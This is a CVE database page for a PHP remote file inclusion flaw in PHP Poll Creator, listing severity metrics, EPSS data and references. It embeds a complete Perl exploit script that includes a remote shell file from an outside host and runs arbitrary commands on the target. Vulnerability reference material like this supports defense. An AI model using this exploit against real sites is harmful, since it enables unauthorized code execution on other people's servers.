CVE-2006-7135 : Detail

CVE-2006-7135

5.5%V3
Network
2007-03-06
23h00 +00:00
2017-07-28
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

PHP remote file inclusion vulnerability in lib/functions.inc.php in PHP Poll Creator (phpPC) 1.04 allows remote attackers to execute arbitrary PHP code via a URL in the relativer_pfad parameter, a different vector and version than CVE-2005-1755. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 2491

Publication date : 2006-10-07
22h00 +00:00
Author : ThE-WoLf-KsA
EDB Verified : Yes

#!/usr/bin/perl #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- - - [xp10 TEAM THE BEST POLISH TEAM] - - #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- phpPC <= 1.03 RC1 Remote File Include Exploit #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- [Script name: phppc #- [Script site: http://www.phppc.de/ #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- Find by: The-wolf-ksa (wolf) #+ #- wolf TEAM #+ #- Contact: [email protected] #- or #- http://www.xp10.com.pl/ #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- Special Greetz: ;-) #- Ema: #- my friends #- #- Greetz for all users wolf TEAM IRC Channel !! #!@ Przyjazni nie da sie zamienic na marne korzysci @! #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- Z Dedykacja dla osoby, #- bez ktorej nie mogl bym zyc... #- K.C:* J.M (wolf) #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Example: http://[site]/phppc/lib/functions.inc.php?relativer_pfad=http://members.lycos.co.uk/visualmx/r57n.txt? use Tk; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindow(title => "wolf TEAM :: phpPC 1.03 Remote File Include Exploit :: by the-wolf-ksa ;-) " ); $mw->geometry ( '500x300' ) ; $mw->resizable(0,0); $mw->Label(-text => 'phpPC 1.03 RC1 Remote File Include Exploit by the-wolf-ksa', -font => '{Verdana} 7 bold',-foreground=>'blue')->pack(); $mw->Label(-text => '')->pack(); $fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ; $fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ; $url = 'http://www.site.com/[path]/lib/functions.inc.php?relativer_pfad='; $shell_path = 'http://shell.txt?'; $cmd = 'ls -la'; $fleft->Label ( -text => 'Script Path: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'Shell Path: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$shell_path) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'CMD: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$cmd) ->pack ( -side => "top" , -anchor => 'w' ) ; $fright->Label( -text => ' ')->pack(); $fleft->Label( -text => ' ')->pack(); $fright->Button(-text => 'Exploit Include Vulnerability', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => \&akcja )->pack(); $fright->Label( -text => ' ')->pack(); $fright->Label( -text => 'Exploit coded by the-wolf-ksa', -font => '{Verdana} 7')->pack(); $fright->Label( -text => 'wolf TEAM :: The Best Polish Team', -font => '{Verdana} 7')->pack(); $fright->Label( -text => '[email protected]/', -font => '{Verdana} 7')->pack(); MainLoop(); sub akcja() { $InfoWindow=$mw->DialogBox(-title => 'wolf TEAM :: Exploit by the-wolf-ksa ;-) ', -buttons => ["OK"]); $InfoWindow->add('Label', -text => ' for help [email protected] #wolfteam', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => 'wolf TEAM SITE: http://www.xp10.com.pl/', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => 'Greetz For my friends ;-)', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; system("start $url$shell_path$cmd"); $InfoWindow->Show(); } # xp10.com ] # milw0rm.com [2006-10-08]

Products Mentioned

Configuraton 0

Php_poll_creator>>Php_poll_creator >> Version 1.04

    References

    http://secunia.com/advisories/15510
    Tags : third-party-advisory, x_refsource_SECUNIA